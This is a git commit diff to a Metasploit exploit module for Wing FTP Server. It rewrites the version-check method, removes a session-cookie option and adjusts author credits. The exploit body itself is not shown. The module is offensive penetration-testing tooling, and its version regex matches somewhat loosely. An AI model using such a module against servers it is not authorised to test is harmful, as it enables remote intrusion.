Improved check method.

master
Imran E. Dawoodjee 2018-12-07 17:21:38 +08:00
parent 92c56472ba
commit 0573caafc3
No known key found for this signature in database
GPG Key ID: C624AF1BC0AFB44B
1 changed files with 10 additions and 7 deletions

View File

@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Author' =>
[
'Nicholas Nam <nick[at]executionflow.org>',
'Imran E. Dawoodjee <imrandawoodjee.infosec[at]gmail.com> (minor improvements)'
'Imran E. Dawoodjee <imrandawoodjee.infosec[at]gmail.com>' # minor improvements
],
'License' => MSF_LICENSE,
'References' =>
@ -46,8 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
[
Opt::RPORT(5466),
OptString.new('USERNAME', [true, 'Admin username', '']),
OptString.new('PASSWORD', [true, 'Admin password', '']),
OptString.new('UIDADMIN', [false, 'Session cookie', ''])
OptString.new('PASSWORD', [true, 'Admin password', ''])
], self.class
)
deregister_options('CMDSTAGER::FLAVOR')
@ -64,11 +63,15 @@ class MetasploitModule < Msf::Exploit::Remote
if ver.code != 200
fail_with(Failure::NotFound, "#{peer} - License page was not found.")
elsif ver.get_html_document.at('span').to_s.include? "Wing FTP Server 4.3.8"
elsif ver.get_html_document.text.to_s.include? "Wing FTP Server"
version = ver.get_html_document.at('span').text.to_s
if version[/([0-4]\.[0-3]\.[0-8])/]
print_good("Detected version: #{version}")
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
return Exploit::CheckCode::Safe
end
end
def exploit